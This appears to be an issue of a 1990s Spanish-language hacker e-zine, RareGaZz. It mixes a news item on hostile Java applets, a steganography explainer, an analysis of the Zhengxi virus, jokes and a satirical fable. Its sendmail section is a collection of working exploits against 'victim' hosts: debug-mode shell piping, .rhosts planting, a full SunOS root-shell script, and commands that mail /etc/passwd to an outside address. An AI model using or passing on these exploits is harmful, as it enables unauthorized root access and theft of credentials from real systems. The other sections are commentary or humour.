declarado la guerra a los applets java en Internet que producen daños o consumen demasiados recursos de un sistema intencionalmente. Este es el mensaje por parte de SUN en respuesta a una intensa investigacion acerca de la seguridad de Java. Las investigaciones se realizaron despues de que academicos, cientificos y hackers anunciaron que algunos applets bajados del WWW presentaban graves peligros de seguridad para los usuarios. Los applets Poison Java son hostiles, y maliciosas trampas creados para 'husmear' en la computadora ajena usando java como su tecnologia. Un grupo de cientificos de la universidad de Princeton, publicaron un articulo donde declaran "El sistema Java en su forma actual no podra asegurarse facilmente." Mas pruebas de los investigadores revelaron que surfeadores inocentes en la red que 'bajaban' applets java en Netscape Navigator y el navegador de Sun HotJava, se arriesgan a encontrar applets hostiles que interfieran con sus computadoras (consumiendo RAM y ciclos CPU). Tambien fue descubierto que los applets podian conectar a una tercera persona a Internet y que sin el conocimiento de esta 'subir' informacion sensitiva de la computadora del usuario. Hasta las mas sofisticadas 'barreras de fuego' (firewalls) pueden ser penetradas . . . "por que el ataque es lanzado detras de la barrera," dijeron los cientificos. Un lector dijo, "No tenia idea de que era posible encontrar websites que lanzaran un ataque al navegador." Otro dijo, "Si se permite que esto se salga de control la gente empezara a retirarse de la red." [ Menos gente, mas velocidad :-) ] Una recomendacion de los cientificos es que apaguen el poder de ejecutar applets java en sus navegadores. Los investigadores sienten que SUN y Netscape deben de aclarar los temas sobre seguridad respecto a Java. Los investigadores entrevistaron al guru de securidad JavaSoft, Ms. Marianne Mueller, quien dijo "estamos tomando la seguridad muy en cuenta y trabajamos muy duro para solucionar esos problemas." Mueller dijo que Java necesita ser re-escrito desde el principio. " El hecho de crear una 'caja de arena' donde los applets puedan ejecutarse sin salirse es algo duro..." La solucion hasta el momento es crear una caja de arena que avise al usuario cuando un applet trate de salirse de ella. El usuario asi, podra seleccionar continuar si se encuentra en un sitio de confianza o cancelar. "Podemos poner mecanismos en lugar para que la interfaz del usuario pudiera ver lo que un applet esta haciendo en su sistema de una manera amigable para que asi pudieran ser en determinado caso, apagados los applets. Desde luego, esto solo sirve si el applet no ha 'matado' todos los recursos." Los expertos no creen que el problema de los applets poison o black widows se solucione pronto, de hecho, se espera empeore. Los hackers creen que cuando Microsoft saque al mercado la nueva version de Internet Explorer con soporte para Java, Visual Basic scripts y añada poder a la tecnologia ActiveX, los problemas de seguridad empeoraran. "Esta es una oportunidad de abusar, y se esta convirtiendo en un enorme problema," dice Stephen Cobb, director de los proyectos especiales de la asociacion nacional de seguridad informatica (NCSA). "Por ejemplo, la tecnologia OLE de Microsoft ActiveX tiene un acceso mucho mas profundo en un sistema que Java." ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈ Algunos Bugs de Sendmail ≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈ Por: Psycho Tranze Para: RareGaZz Esta informacion fue recopilada de distintas fuentes en Internet y ha sido organizada con el proposito de tener una referencia de los hoyos en la seguridad del sistema unix en especial Sendmail. ----------------------------------------------------------------- BUG Version de Sendmail ----------------------------------------------------------------- = WIZ = *Vieja* = DEBUG = *Vieja* = TURN = *Vieja* = OVERFLOW INPUT BUFFER = *Vieja* = DECODE ALIAS = *?????* = -oR SunOS = *SunOS-sendmailV5.22* = -oM = *8lgm6Dec1994-SMI-Sendmail(sm basado en SunOS)* = Sobre escribir archivos = *Arreglado en 5.59* = -oQ = *?????* = |PROGRAM = *Probado en 5.55* = WIZ = *Vieja* El mas viejo y facil agujero en sendmail es la puerta trasera 'wiz', y ahora es muy dificil de encontrar. En la conexion solo escribe 'wiz' y despues 'SHELL', y ya estaras en una shell root. [ puede configurarse en el archivo sendmail.cf ... Opcion 'OW' inmediatamente seguido de el password encriptado ] = DEBUG = *Vieja* Este bug fue usado por el gusano de internet escrito por Robert T. Morris Jr. Este exploit permite a cualquiera ejecutar un programa en una maquina remota. Simplemente consiste en dar el comando 'debug', usar una pipe a /bin/sh como recipiente y alimentar los datos con los comandos que quieras ejecutar en la maquina remota. [ Si el servidor sendmail contesta con "200 Debug set" a el comando 'debug' existe la oportunidad de que el bug este presente. ] Ejemplo: #!/bin/sh telnet << EOF open victima.com.mx 25 debug mail from: </dev/null> rcpt to: <\"|sed -e '1,/^$/'d | /bin/sh ; exit 0\"> data cp /bin/sh /tmp/sushi # o como alternativa: chmod 4755 /tmp/sushi # echo "+ +" >> /.rhosts . EOF = TURN = *Vieja* El comando TURN permite robar el correo ... [ Muy viejo bug ] = OVERFLOW INPUT BUFFER = *Vieja* Causa que el daemon de sendmail se estrelle ... [ Muy viejo, solo para la coleccion ;) ] = DECODE ALIAS = *?????* Si '/etc/aliases' contiene "|/usr/bin/uudecode" cualquiera puede enviar correo a decode, escribir a cualquier archivo perteneciente a daemon, si pueden conectarse a el sendmail daemon, pueden escribir a los archivos de cualquier usuario. Para probar la existencia de el alias decode desde una conexion sendmail: % telnet victima.com.mx 25 Trying 127.127.127.127 Connected to target.com Escape character is '^]'. 220 victima.com.mx Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT expn decode 250 <"|/usr/bin/uudecode"> quit /\/ 1er Exploit \/\: % echo "mi-servidor.com" | uuencode /usr/bin/.rhosts | mail decode@victima.com.mx /\/ 2do Exploit \/\: % cat > outfile # Creamos nuestro propio .rhosts + + ^C % uuencode outfile /usr/bin/.rhosts begin 644 /bin/.rhosts $*R'K"O\ % telnet victima.com.mx 25 220 victima.com.mx SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST) VRFY decode 250 <|/usr/bin/uudecode> MAIL FROM: bin 250 <bin> ... Sender Okay RCPT TO: decode 250 <decode> ... Recipient Okay DATA 354 Enter mail, end with "." on a line by itself begin 644 /bin/.rhosts $*R'K"O\ # Es solo "+ +" uuencoded end . 250 Mail accepted quit 221 victima.com.mx closing connection Connection closed by foreign host. % rlogin victima.com.mx -l bin $ Si no hay directorios conocidos o que se puedan escribir, una interesante variacion es crear un archivos bogus /etc/aliases.pag que contenga un alias con un comando que quieras ejecutar en tu objetivo. Esto puede funcionar ya que en muchos sistemas los archivos aliases.pag y aliases.dir, que controlan los alias del sistema no estan protegidos. evil % cat decode bin: "| cat /etc/passwd | mail raregazz@bigfoot.com" evil % newaliases -oQ/tmp -oA`pwd`/decode evil % uuencode decode.pag /etc/aliases.pag | mail decode@victima.com.mx evil % /usr/lib/sendmail -fbin -om -oi bin@victima.com.mx < /dev/null = -oR SunOS = *SunOS-4.1.X-sendmailV5.22* La opcion -oR usa popen() para regresar el correo que no pueda ser entregado. El impacto de este bug es que usuarios locales pueden obtener privilegios de R00T! -------------------------- ropt.sh --------------------------------------- #!/bin/sh # # Syntax: roption servidor # # servidor es cualquier sisteme corriendo sendmail (excepto el host local). # # Este programa explota un error en SunOS sendmail(8) y trata de crear un # root shell suid. # # Pon atencion al script, algunas cosas hay que modificarlas para que se # adapte al sistema en que lo ejecutas, por ejemplo el directorio temporal. # # Written 1995 by [8LGM] # Please do not use this script without permission. <-- Jah! # PROG="`basename $0`" PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS # Check args if [ $# -ne 1 ]; then echo "Syntax: $PROG host" exit 1 fi # Check we're on SunOS if [ "x`uname -s`" != "xSunOS" ]; then echo "Sorry, this only works on SunOS" exit 1 fi PROG="`basename $0`" EXECME=/tmp/HotterThanMojaveInMyHeart # Create EXECME.c cat > $EXECME.c << 'EOF' main(argc,argv) int argc; char *argv[]; { chown("/tmp/InfamousAngel", 0, 0); chmod("/tmp/InfamousAngel", 04755); } EOF cc -o $EXECME $EXECME.c # Check we have EXECME if [ ! -x $EXECME ]; then echo "$PROG: couldnt compile $EXECME.c - check it out" exit 1 fi /bin/cp /bin/sh /tmp/InfamousAngel # Run sendmail /usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF' To: No1InParticular Hows it goin EOF exec /tmp/InfamousAngel ................................Corta..Aqui.................................. = -oM = *8lgm6Dec1994-SMI-Sendmail(based on SunOS sm)* El sendmail de Sun permite la opcion -oM para crear cualquier macro, y aun retiene el privilegio root. (La lista de macros 'confiados' -trusted- debe ser limitada) Los sendmails afectados son "SunOS 4.x Sendmail - y la ultima version de diciembre de 1994. EXPLOIT: 1. Crea el archivo sunsendmailcp ------------------------corta aqui---------------------------- #!/bin/sh # # sunsendmailcp remitente destino if [ $# -ne 2 ]; then echo usage: `basename $0` from to exit 1 fi rm -f /usr/tmp/dead.letter if [ -f /usr/tmp/dead.letter ]; then echo sorry, cant continue - /usr/tmp/dead.letter exists fi if [ ! -r $1 ]; then echo $1 doesnt exist or is unreadable exit 1 fi ln -s $2 /usr/tmp/dead.letter /usr/lib/sendmail -L0 '-oM#anything' $USER < $1 rm /usr/tmp/dead.letter exit 0 ------------------------corta aqui---------------------------- 2. Ejecuta el comando % ./sunsendmailcp archivofuente archivodestino y el archivo destino sera creado o si existe sera continuado. = Sobre escribe archivos = *Arreglado en 5.59* Usuarios remotos pueden escribir en cualquier archivo que NO tenga privilegio de root. telnet victima.com 25 rcpt to: /home/zen/.rhosts mail from: zen data cualquier cosa . rcpt to: /home/zen/.rhosts mail from: zen data + + . quit % rlogin victima.com -l zen Welcome to victima.com! victima % = '-oQ' = *?????* Este error involucra a las opciones '-q' y '-oQ' causando que cualquier archivo pueda ser borrado o leido. Debes crear un tipo de archivo 'qf' en el directorio /usr/spool/mqueue como este: P28 T599831504 Dfilename Suser Ruser H?P?return-path: <user> H?F?from: user (User Name) H?x?full-name: User Name HTo: user Hsubject: Gotcha despues que el comando 'sendmail -q -oQ' es ejecutado, el 'filename' es borrado y sus contenidos mandados a 'user'. - - - - El 'oQ' usa la opcion Q que escoge en que directorio poner los mensajes marcados para futuro envio. La opcion 'q' hace que daemon procese los mensajes en espera. - - - - = '|PROGRAM ' = *Probado en 5.55* Cualquiera puede especificar comandos arbitrarios shells o paths para la direccion destino y/o remitente. Un ataque tipico para obtener el archivo de passwords es: % telnet victima.com 25 Trying 123.456.789.0... Connected to victima.com Escape character is '^]'. 220 victima.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51 mail from: "|/bin/mail hacker@miservidor.com < /etc/passwd" 250 "|/bin/mail hacker@miservidor.com < /etc/passwd"... Sender ok rcpt to: mickeymouse 550 mickeymouse... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. % [Psycho Tranze nos prometio algunos mas nuevos para el siguiente numero :-)] ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] IMPLEMENTACIONES -= DE LA =- ESTEGANOGRAFIA Para aquellos que no sepan, la esteganografia (steganography) es una tecnica cryptografica que simplemente esconde mensajes dentro de mensajes. El remitente crea un mensaje nada sospechoso y despues, usando una de muchas tacticas, inyecta el mensaje secreto dentro de el. Algunas tecnicas son: Tintas invisibles, distorcion de caracteres, diferencias de escritura, cambiado de bits, etc... El metodo especificado en este articulo es una bien conocida implementacion esteganografica, nivel bajo de cambio de bits en imagenes graficas. Esteganografia es una tecnica para esconder datos en otros datos. El metodo general es cambiar bits para que leyendo el nuvel bajo de cada 8 bytes se obtenga un caracter. Esto permite a uno usar un archivo de imagen o sonido para esconder archivos, resultando en un pequeño bit de ruido que pasa des- apercibido y en un archivo de datos guardado que luego podra ser extraido. Este papel describe un metodo para esconder archivos mas seguro, el metodo se llama dispersion pseudo-al hazar (pseudo-random dispersion). Ordinariamente, si alguien sospecha que tienes archivos de datos escondidos, digamos en un GIF solo tendrian que ejecutar el extractor apropiado y encontrar los datos. Si los datos no estan encriptados, estara el archivo 'desnudo' para que cualquiera lo vea. Esto puede ser aminorado usando una proteccion simple de password,escondiendo el password en el archivo GIF como encabezado, encriptandolo primero con el mismo. Si alguien no sabe el password, no podran extraer la informacion. Esto es desde luego razonablemente seguro, dependiendo en la encripcion usada, y lo recomiendo. Pero los archivos escondidos pueden estar mas seguros. La dispersion Pseudo-Hazar trabaja escondiendo un password, y una semilla de un generador de numeros aleatorios en el encabezado encriptado. Entonces, un generador aleatorio de bytes es pasado, antes de que los bytes en el nivel bajo sean cambiados. Para hacer esto, uno primero debe calcular cuantos bytes un bit puede ocupar por el mismo. Por ejemplo, para esconder un mensaje de 800 caracteres en un GIF significaria que cada caracter necesita 8 bytes (8 bits por caracter, 1 byte por cada bit de orden bajo), asi que necesitarias 6,400 bytes de datos para esconder el mensaje en, 8 bytes por caracter. Digamos que tenemos un GIF que tiene por lo menos 10 veces este tamaño: 64,000 bytes. Asi, tenemos 80 bytes por caractero para esconder datos. Como cada bit toma un byte, ¡tendriamos 10 bytes por cada bit para esconder datos! Asi pues, si tomamos un pseudo-generador aleatorio de numeros entre 1 y 10, y usamos ese byte para esconder nuestro bit de nivel bajo, hemos alcanzado dispersar un mensaje a traves del GIF en una forma aleatoria, mucho mas dificil de extraer. Una mejora puede hacerse a este algoritmo. Re-calculando el numero disponible de bytes en cada bit despues de que cada bit es escondido, los datos son dispersados mas parejo sobre el archivo, en lugar de amontonar los datos al principio, que seria una ocurrencia normal. Si usas un generador aleatorio de numeros, escogiendo numeros del 0-9, despues, los valores se normalizaran a 5.Esto ocasionaria que el mensaje escondido quedara amontonado al principio del GIF.Si recalculamos cada vez el numero disponible de bytes dispersariamos los datos por todo el archivo, con el extra bono de que los bits se dispersen mas aparte que los primeros, resultando en posibles espacios de busqueda de 20, 32, 100, o hasta 1,000 posibles bytes por bit. Esto tambien sirve para hacer los datos mucho mas dificiles de extraer. Recomiendo tener un encabezado lo suficientemente largo como para un password de 8 caracteres ASCII, una semilla integral de numeros aleatorios, un numero integral de version, y un lugar en blanco para futuros usos. El numero de version nos permite compatibilizar con previas versiones de el programa. El encabezado debe estar encriptado y sin dispersar. Es util hacer el extractor de una manera que siempre extraiga algo, sin importar que el password sea el correcto o no. Hacer esto significa que es imposible saber si has adivinado un password correcto y has obtenido los datos o solo basura que parecen datos encriptados. El uso de un password puede ser opcional. Un simple default password puede ser usado en estos casos. Cuando escondas datos encriptados, no hay diferencia para el ojo simple entre basura o datos, asi que el password no es extrictamente necesario. Esto significa que no tendras que memorizar ningun password, o transmitirlo a otras personas. ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦ El padre de todos los virus ΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩ Primera Parte El virus Zhengxi es un virus parasitico, residente, infecto de ficheros EXE y OBJ, polimorfico y stealth. Ademas, inserta droppers en formato COM en los ficheros ZIP, ARJ y RAR, ademas de los EXE self-extracting. Su tamaño es de tan solo 7k, y se trata de un virus muy complejo, probablemente el virus mas complejo que existe. Infecta ficheros EXE, y lo hace de dos formas: o bien de forma parasitica (es decir, modificando la cabecera y escribiendo su codigo al final del fichero) o bien, tras haber encontrado subrutinas de tipo C o Pascal en el fichero, sobreescribiendo una rutina del mismo tipo con un cargador del virus, y escribiendo la rutina original y el cuerpo encriptado del virus al final. Tambien, como dijimos, inserta su codigo en los ficheros OBJ. Los ficheros OBJ son creados por el compilador de ensamblador TASM y necesitan ser linkados con el programa Link que compila estos ficheros y los convierte en ejecutables. Cuando estos archivos son linkados se convierten en ficheros EXE infectados. Por ultimo, el virus tambien introduce droppers en formato COM en los ficheros comprimidos con ZIP, ARJ o RAR usando rutinas internas de descompresion. Asi pues, tenemos que el virus usa cuatro tipos de infeccion: EXE appending, EXE inserting, OBJ, y droppers COM. Parece como si pretendiese ser, y de hecho lo es, un "todo en uno", recogiendo en su codigo diversas ideas que aparecieron previamente en otros virus: Infeccion de OBJ (del virus Shifting Objective, de Stormbringer), de ficheros comprimidos (como el virus Dementia), y de EXE con rutinas tipo C o Pascal (del tipos Lucretia). La rutina de desencriptado es mas compleja que la de Eugene Kaspersky y, con toda probabilidad, el resto del mundo no ha visto rutinas tan complejas que las que se pueden ver observando el codigo de un EXE infectado. Parece como si fuese una rutina generada por la engine SMEG, de Black Baron, pero muy mejorada y mil veces mas compleja (hay muchisimas llamadas a rutinas basura, funciones CP/M y de la int 21h, incluyendo llamadas directas a la tabla de vectores de interrupcion). Esta primera rutina de desencriptado nos descubre otra rutina mas (el virus esta encriptado con dos loops polimorficos complejisimos), que finalmente nos descubre el codigo virico. La suma total de la longitud de estas rutinas de desencriptado asciende a mas de 2k. Tras tracear durante horas a traves de estas subrutinas, montones de instrucciones basuras y llamadas a funciones del DOS, el cuerpo del virus aparece por fin desencriptado, y en el podemos apreciar las siguientes cadenas de texto: Abnormal program termination The virus/DOS 0.54 Copyright (c) 1995 Zhengxi Ltd Warning! This program for internal use only! El estilo en que esta escrito el codigo del virus es tan extremadamente complejo que resulta dificil encontrar el proposito de mas de cien de sus subrutinas, asi como de varios cientos de ramificaciones de las mismas. El virus usa dos tipos distintos de referencias para dirigirse a los mismos datos: El acceso directo a la direccion y el acceso indexado. A veces el virus usa la primera variante y a veces la segunda, e incluso los mejores desensambladores (Sourcer, IDA...) no pueden construir las tablas de referencia que nos resultan tan utiles de cara al analizar el codigo de un virus. El virus tambien usa ramificaciones "escondidas" y es muy dificil de encontrar la direccion destino de estas ramificaciones ya que hay varias combinaciones posibles. El virus presta especial atencion a varios ficheros, pero, a diferencia del resto de los virus que conocemos, no contiene sus nombres entre el codigo virico, sino que contiene palabras (2 bytes) CRC para cada uno de los nombres. Cuando se accede a un fichero, el virus calcula el CRC de cinco caracteres cualesquiera del nombre de dicho fichero, obteniendo asi una palabra CRC, que va comparando con las correspondientes a los ficheros que requieren una atencion especial por su parte, y que se encuentran entre el codigo virico, tambien en formato CRC. Asi, tenemos que el virus "empaqueta" cinco caracteres del nombre del fichero en tan solo 2 bytes de suma CRC. La rutina inversa a esta que usa el virus genera aproximadamente 25000 variantes de nombres posibles. El fichero resultante con todas estas combinaciones ocupa mas de 400k, con lo que nos podemos ir haciendo una idea de la complejidad del virus. El virus tiene almacenadas 16 palabras CRC, es decir, a fin de cuentas, 16 nombres de ficheros a los que presta una atencion especial por distintos motivos. Ahora mismo hay 11 de esos 16 nombres encontrados, es decir, que se ha averiguado a que programa corresponden: UUENC UUENCODE PKLIT PKLITE LZEXE LZEXE.EXE NDD.E NDD.EXE DIET. DIET.EXE AFD.E AFD.EXE SD.EX SD.EXE SPEED SPEEDDSK.EXE DEFRA DEFRAG.EXE TLINK TLINK.EXE LINK. LINK.EXE Tras haber encontrado la mayor parte de los nombres, aun nos espera otro plato fuerte: el virus tambien usa CRCs para analizar la cabecera de los ficheros antes de infectarlos. El Zhengxi tiene una tabla que consta de ocho CRCs (y ya van 24 en total); el proceso de comprobacion de ficheros validos para infectar consiste en calcular la suma de los CRC de los cuatro primeros bytes de la cabecera y compararla con los CRCs de su tabla. Tras hacer esto, repite el proceso, disminuyendo el numero de bytes al calcular la cabecera hasta dos y uno. Con la rutina inversa encontramos muy rapido cuatro de las ocho variantes: la variante de un byte, de la cabecera OBJ (80h), dos variantes de dos bytes correspondientes a la cabecera EXE ("MZ" y "ZM"), y otra mas de dos bytes, la de los ficheros comprimidos con ARJ (60eah). El resto de las variantes era las de cabeceras de cuatro bytes, y aparecieron dos de ellas: la de ficheros ZIP (504b0304h), y la del RAR (Rar!). Las otras dos cabeceras que faltan de momento no estan identificadas. La primera de ellas parece corresponder a los ficheros generados por otro compresor, ya que la rutina que le da el control esta muy cerca de las rutinas de descompresion de ARJ, ZIP y RAR, ademas de usar las mismas subrutinas de infeccion que estas. Por estos mismos motivos, tambien parece ser que la octava y ultima variante que hace falta este relacionada con los ficheros de formato OBJ. Para encontrar estas variantes, la rutina inversa estuvo trabajando dos dias seguidos y sin interrupcion en un 486/66 MHZ. El resultado fue de nada mas y nada menos que 65000 variantes para cada suma CRC. Ademas, como los bytes estan "empaquetados" dentro de dos bytes CRC, la operacion inversa nos da 65000 variantes de cada fuente de cuatro bytes. Los ficheros resultantes y correspondientes a cada suma CRC ocupaban mas de 1MB de longitud. Ni que decir tiene que las combinaciones posibles ascendian a mas de 260000 (65000*4). A pesar de esto, ya conocemos seis de ocho. El codigo del virus recibe el control desde distintos puntos, dependiendo del modo de infeccion, perp de todas formas el destino siempre es la rutina polimorfica de desencriptado. En los ficheros EXE (appending) la rutina de desencriptado recibe el control inmediatamente cuando el EXE es cargado en memoria para ejecutarse; en los ficheros EXE (inserting) esta recibe el control del cargador del virus; en los ficheros OBJ compilados desde un call, y por ultimo en los droppers formato COM, la ejecucion comienza con un jmp, que salta directamente al desencriptado. Una vez desencriptado, la rutina de instalacion del virus recibe el control. Primero el virus mueve su codigo para asi alinearse por parrafos (16 bytes); engancha a la int 1 (traceo paso a paso), y tracea la int 21h. El virus llama a una funcion bastante inusual para hacerlo: la llamada 19h del CP/M (obtener unidad actual). Esta llamada le da el control al handler de la int 21h original del DOS tras haber ejecutado algunas instrucciones y entonces es cuando el virus empieza a tracear al codigo de la int 21h original. Al tracear este codigo, el handler es interrumpido tras cada instruccion ejecutada. El virus entonces recibe el control y calcula el CRC (una vez mas) de 12 bytes del codigo de la int 21h. Si el CRC es igual a una de dos posibles variantes, el virus parchea este codigo, y se instala residente en memoria. Es absolutamente imposible encontrar las variantes de codigo que busca el virus. Los 12 bytes de codigo estan empaquetados en 2 bytes de posibles variantes, la primera y la segunda. El resultado de la operacion inversa nos da mas de 2*10000000000h variantes de codigo...y no, no me he equivocado al poner la "h" despues del numero... no es un numero binario ni decimal, sino hexadecimal. Por tanto tenemos que el unico medio de investigacion consiste en probar diferentes DOSs en diferentos modos (alto o bajo), y mirar como ha parcheado el virus la int 21h. Por el momento solo se encontro una variante de codigo que parchea el virus, y que se corresponde con parte del handler de la int 21h del DOS 5.x/6.x; el dump hexadecimal es asi: 06 1E 55 57 56 52 51 53 50 8C D8 (push/push/../push/ mov ax,ds) Si el virus encuentra este codigo, comprueba distintas condiciones antes de hacer el parcheo y termina su instalacion. La instalacion del virus consiste en reubicar el bloque de memoria del sistema usando las funciones del DOS ChangeMem y AllocateMem (int 21h, ah=4ah, 48h), dejando para la copia residente del virus, y entonces almacena en su codigo 11 bytes de la direccion del handler de la int 21h para luego parchear el codigo de esta int con un far call (2fh ffh 1eh ?? ??). ¿Y cual es la direccion a la que apunta este far call? Cualquiera con un minimo de idea responderia que a su propio handler de la int 21h. Pues de eso nada. El destino es la direccion de la int 25h (absolute disk read). La siguiente sorpresa consiste en que el virus guarda los cincos primeros bytes del handler de la int 25h, y escribe alli cinco bytes nuevos, que conforman un far jmp al codigo virico. El resultado queda asi: El virus usa una "palabra magica", 06c7h, justo despues del call far a la direccion de la int 25h. En principio no parece haber otra razon para hacerlo que para ocultar el codigo desensamblado. El resultado de este parcheo es un codigo normal, sin comandos extraños. Por lo tanto el virus tiene el mismo handler para interceptar la int 21h y la int 25h. Para separar las llamadas a ambas ints, el virus chequea la direccion del programa que las llama (caller_ip); si la llamada va dirigida a la int 21h, el virus le pasa el control a la rutina del handler de la int 21h propia. En otro caso, el que recibe el control es el handler que usa el virus para la int 25h. Por cierto, se habran dado cuenta que el virus no usa ningun chequeo de instalacion para evitar irse residente mas de una vez. La razon es simple, ya que antes de instalarse, el virus busca codigo especifico en el handler de la int 21h y lo modifica. Una vez instalado, ese codigo ya no estara presente, por lo que el virus no se re-instalara. La rutina de instalacion esta completa; el codigo virico esta copiado en un bloque de memoria del sistema y las ints 21h y 25h ya estan interceptadas. Pero aun falta por decir que el virus es capaz de mover su codigo a otros bloques de memoria (ver el analisis del handler de la int 21h). Por tanto la copia residente del virus no ocupa los mismos bloques de memoria del sistema, y puede moverse a otras direcciones incluyendo las del UMB. Una vez instalado, el virus retorna el control al fichero host. Este tiene tres metodos distintos de hacer dicho retorno, dependiendo del tipo de infeccion. En caso de haberse instalado desde el dropper COM, el virus se limita a enseñar el siguiente mensaje: Continua en RareGaZz #5 <--- Parece novela...shit! ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ┌───────────────────────┐ │ │ │ ¿Es Windows un Virus? │ │ │ └───────────────────────┘ Pregunta a McAfee: ¿Es Windows un Virus? No, Windows no es un virus. Esto es lo que hacen los virus: Ellos se replican rapidamente. -- Okay, Windows hace eso. Los virus toman recursos valuables haciendo mas lento el sistema. -- Okay, Windows hace eso. Los virus, de vez en vez, echaran a perder tu disco duro. -- Okay, Windows hace eso. Los virus son usualmente contenidos, sin saber el usuario, junto con programas valiosos y sistemas. -- Okay, Windows hace eso tambien! Los virus haran ocasionalmente sospechar a el usuario que su sistema es demasiado lento y el usuario comprara nuevo hardware. -- Yup, eso tambien es Windows. Hasta ahorita parece que Windows es un virus pero hay algunas diferencias fundamentales: Los virus estan bien apoyados por sus autores, pueden ser ejecutados en la mayoria de los sistemas, su codigo de programacion es rapido, compacto y eficiente, ademas tienden a hacerse mas sofisticados conforme maduran. Asi que Windows *NO* es un virus. Es un error. (bug) Autor: saarm@netvision.net.il Traduccion: RareGaZz ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ()()()()()()()()()()() () Los vendedores () () y () () el Anacoreta () ()()()()()()()()()()() Homero Roa era un ermitaño que no sabia nada del mundo... Pero alla en la ciudad, lejos de su cabaña, vivian dos vendedores, vendedores de FELICIDAD.-Cada uno representaba una felicidad distinta, por lo tanto, eran rivales. La felicidad de uno se llamaba Capitalismo. (Elmer Zig) Y el otro llamaba a su sistema de felicidad: Comunismo. (Fedor Zag) Cada uno de ellos sabia que ganar a Homero Roa para su causa seria un gran triunfo ya que Roa representaba la pureza, la neutralidad y el desinteres... Y asi el anacoreta comenzo a recibir inesperadas visitas. "Nuestro sistema para lograr la felicidad es el mejor."-Dijo Elmer Zig "Todo lo que usted tiene que hacer es ser de los nuestros y lo tendra todo." "Primero se baña, se rasura, se viste de hombre de negocios y obtiene un empleo con un salario fijo..." "Ahora es usted un caballero y entrara triunfante en el mundo occidental - El mundo del dinero le dara toda la dicha que anhela..." "Usted tiene un empleo, Homero Roa.- Ese empleo le da un salario y una seguridad.- Con el ahorro, que es otro de nuestros inventos, usted prosperara." "Tiene una hora para almorzar.-Puede correr a la fonda... buscar un asiento... pedir un 'sandwich'...fumar un cigarrillo...y volver al trabajo." "Pero lo mejor del dia viene ahora: a orillas de la ciudad esta el nido de amor que usted paga en comodos plazos; ahi su bella mujercita le espera...¡y los retoños!" "La cena esta lista - platillos copiados del 'Lady's Home Journal', ¡Que delicia! - Su dulce suegra, miembro del comite de damas caritativas, esta a la mesa." "No hay nada como la vida familiar en Occidente.-Usted es padre de familia - Es el jefe.- Pero Apresurese la cena, pues sigue lo mejor del hogar ¡LA TELEVISION!" "La television es el mejor substituto del pensamiento. Si usted quiere gozar de ella, ponga su cerebro en blanco.-¡No Piense!" "Los programas de t.v. estan hechos para retrasados mentales.- Cierto, pero no se ofenda.- Usted es uno de ellos solamente cuando ve tales programas." "La television piensa por usted; le dice que cigarrillos debe fumar y que licor debe beber.- Todo lo que toca lo vuelve mediocre, pero evita la molestia de pensar..." "Mi camino a la felicidad -Siguio diciendo Zig- esta lleno de comodidades.- El 'confort' es nuestra especialidad". "Autos que se manejan con botones.- Calefaccion central. Cobertores electricos... O radios de transistores, muy utiles para anacoretas que viven en las montañas.- Ademas, periodicos con tiras comicas y una seccion a colores los domingos." "Y lo que es mejor: ¡Todo esto se lo damos a usted AHORA y lo paga en 20 años." "Pero apresurese a aceptar, pues es una oferta limitada; tal vez *NO* alcance para todos.- El sistema capitalista es bueno para los que lo aprovechan.- ¿Acepta Usted?" El asceta quedo pensativo...luego dirigio una larga mirada a Elmer Zig y dijo: "¡NO!- NO ACEPTO. Primero debo conocer la oferta de la competencia." Zig quedo atonito.- Zag entro en accion como super vendedor de la parte contraria. De lejos notaba que Zig y Zag habian leido dos versiones distintas del "arte de vender". Pero -despues de todo- el producto hace al vendedor y el producto de zag era dicha comunista...Roa escucho... "Nuestro sistema produce felicidad para usted y para las generaciones futuras"- Comenzo diciendo Zag. "Si se afilia a nuestra causa tendra toda la dicha que le ofrecemos..." "En primer lugar se baña. se rasura, se viste de obrero y obtiene un trabajo con salario fijo." "Ahora es nuestro 'camarada' y entrara triunfante en el mundo socialista.- Veamos que clase de dicha le ha reservado el partido..." "Ya es usted un obrero y tiene un salario.- De su seguridad futura se ocupara el partido.- Con disciplina, que es uno de nuestros requisitos, sera un obrero feliz." "Tiene una hora para almorzar; corre al refectorio de la fabrica... Busca un asiento...pide un 'borscht'...fuma un cigarrillo...y 